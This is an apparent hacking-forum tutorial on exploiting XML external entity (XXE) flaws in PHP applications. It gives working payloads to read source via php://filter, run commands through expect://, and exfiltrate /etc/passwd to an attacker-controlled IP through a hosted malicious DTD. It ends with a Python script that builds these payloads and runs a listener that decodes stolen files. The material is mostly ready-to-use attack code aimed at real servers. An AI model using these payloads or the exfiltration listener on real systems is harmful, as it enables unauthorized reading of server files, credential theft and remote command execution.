Article: XXE Vulnerabilities. №2
by OstapBender - Friday December 15, 2023 at 04:36 PM
Continuation of the article: PHP Vulnerabilities.
Reading PHP files
If we need to read a PHP file, we have to go about it a bit differently. PHP source is full of angle brackets, ampersands and quotes, so when the raw contents are substituted into the XML document the parser sees them as malformed markup and rejects the document; we will not get the file back the way we did above. Take the file index.php as an example.
[Image: 1700411278143-png.72241]
So let's use the php:// wrapper with the base64 conversion filter:
php://filter/read=convert.base64-encode/resource=index.php
This hands the parser the file contents as base64, which contains no characters that are special in XML, and we then decode it ourselves:
[Image: 1700412088068-png.72242]
[Image: 1700412179527-png.72243]
Remote command execution is done with the expect:// wrapper. Note that expect:// is only available when the PECL expect extension is installed and enabled, which is rare on production hosts, so this will not work everywhere.
As the screenshot shows, the id command was executed successfully.
[Image: 1700412268124-png.72244]
Out-of-band
There are situations where XXE is present but we get no response at all. Suppose that in our example the server returns nothing, yet we suspect the vulnerability is there. This may mean we are dealing with a blind XXE.
Here is how an out-of-band interaction can be used to detect a blind XXE.
The attacker sends an XML document containing an external entity that points to a URL they control, like this:
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY title SYSTEM "http://sfbhb2v1sgdmwmk60lr6rilt9kfa3z.oastify.com">]>
<title>&title;</title>
When the modified request is sent to the server, the server resolves the entity and makes a request to our Collaborator host. Collaborator then reports that an interaction arrived, which tells us the XXE worked:
[Image: 1700412447768-png.72245]
The requests arrived, so the XXE worked.
Now let's try to read a file. Create a file xxe.dtd on our own server with the following contents. The &#x25; is an encoded percent sign: a literal % is not allowed inside an entity value, so it has to be written as a character reference for the nested parameter entity to be declared.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; getdata SYSTEM 'http://109.252.167.95:1234/?x=%file;'>">
%eval;
%getdata;
And in the request, this payload, which only points the parser at our hosted DTD:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://109.252.167.95/xxe.dtd"> %xxe;]>
[Image: 1700412580478-png.72246]
As you can see, the file contents arrive in the query string of the request to our listener. One caveat: depending on the parser, files containing newlines or other characters that are not valid in a URL may cause the second entity to be rejected instead of fetched. For such files, wrap the resource in the php://filter base64 conversion shown above so the exfiltrated data is URL-safe. Well, that's pretty much it.
Thank you all for your attention. See you again!
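To tie the two techniques from the article together, here is an added example (not code from the original post) that builds the in-band php://filter payload, generates the external DTD for the out-of-band exfiltration, and decodes what comes back on the listener. The callback address 127.0.0.1:1234, the DTD URL and the file contents below are constructed assumptions, not captured traffic; the DTD is generated with the resource wrapped in php://filter base64 by default so that files with newlines survive the trip through a URL.

```python
"""XXE helpers: in-band read via php://filter and blind OOB exfiltration.

Added example for this article, not the author's code. Host names, ports
and file contents are constructed assumptions.
"""
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

# Constructed sample file contents (not taken from a real target).
SAMPLE_INDEX_PHP = "<?php\n$db = mysqli_connect('localhost', 'app', 's3cret');\n?>\n"
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"


def filter_wrapper(path):
    """php://filter URL that base64-encodes the file as it is read, so '<',
    '&', quotes and newlines in the source never reach the XML parser."""
    return f"php://filter/read=convert.base64-encode/resource={path}"


def inband_payload(path):
    """XXE document for a non-blind target: the entity expands to base64 text."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{filter_wrapper(path)}">]>\n'
        "<data>&xxe;</data>"
    )


def encode_as_server_would(contents):
    """What the php://filter wrapper hands the parser for `contents`."""
    return base64.b64encode(contents.encode()).decode()


def decode_inband(b64_fragment):
    """Turn the base64 fragment copied out of the response back into source."""
    return base64.b64decode(b64_fragment).decode()


def oob_dtd(path, callback, use_base64=True):
    """External DTD hosted on the attacker's server. %file; is read on the
    target and spliced into the URL of a second entity; &#x25; is a percent
    sign, because a literal '%' is not allowed inside an entity value."""
    resource = filter_wrapper(path) if use_base64 else f"file://{path}"
    return (
        f'<!ENTITY % file SYSTEM "{resource}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; getdata SYSTEM \'{callback}/?x=%file;\'">\n'
        "%eval;\n"
        "%getdata;\n"
    )


def oob_payload(dtd_url):
    """What goes into the request: only a pointer to the hosted DTD."""
    return f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>\n<foo>x</foo>'


def simulate_callback(contents):
    """Request line the target would send to our listener for `contents`
    (constructed; base64 has no characters that are illegal in a URL)."""
    return f"GET /?x={encode_as_server_would(contents)} HTTP/1.1"


def decode_exfil(request_line, use_base64=True):
    """Recover the file from the callback request line. Uses unquote rather
    than parse_qs/unquote_plus: '+' is a base64 digit here, not a space."""
    target = request_line.split()[1]
    query = urlsplit(target).query
    params = dict(kv.split("=", 1) for kv in query.split("&") if "=" in kv)
    raw = unquote(params["x"])
    return base64.b64decode(raw).decode() if use_base64 else raw


class ExfilHandler(BaseHTTPRequestHandler):
    """Minimal listener: prints the decoded file for every callback it gets."""

    def do_GET(self):
        print(decode_exfil(f"GET {self.path} HTTP/1.1"))
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    print(inband_payload("index.php"))
    print(decode_inband(encode_as_server_would(SAMPLE_INDEX_PHP)))
    print(oob_dtd("/etc/passwd", "http://127.0.0.1:1234"))
    print(oob_payload("http://127.0.0.1/xxe.dtd"))
    print(decode_exfil(simulate_callback(SAMPLE_PASSWD)))
    # To actually listen for callbacks on port 1234, uncomment:
    # HTTPServer(("0.0.0.0", 1234), ExfilHandler).serve_forever()
```

Pass use_base64=False to oob_dtd and decode_exfil when the target is not PHP (php://filter only exists in PHP's stream layer); in that case stick to files without newlines, such as /etc/hostname, since the raw contents are placed directly in the URL.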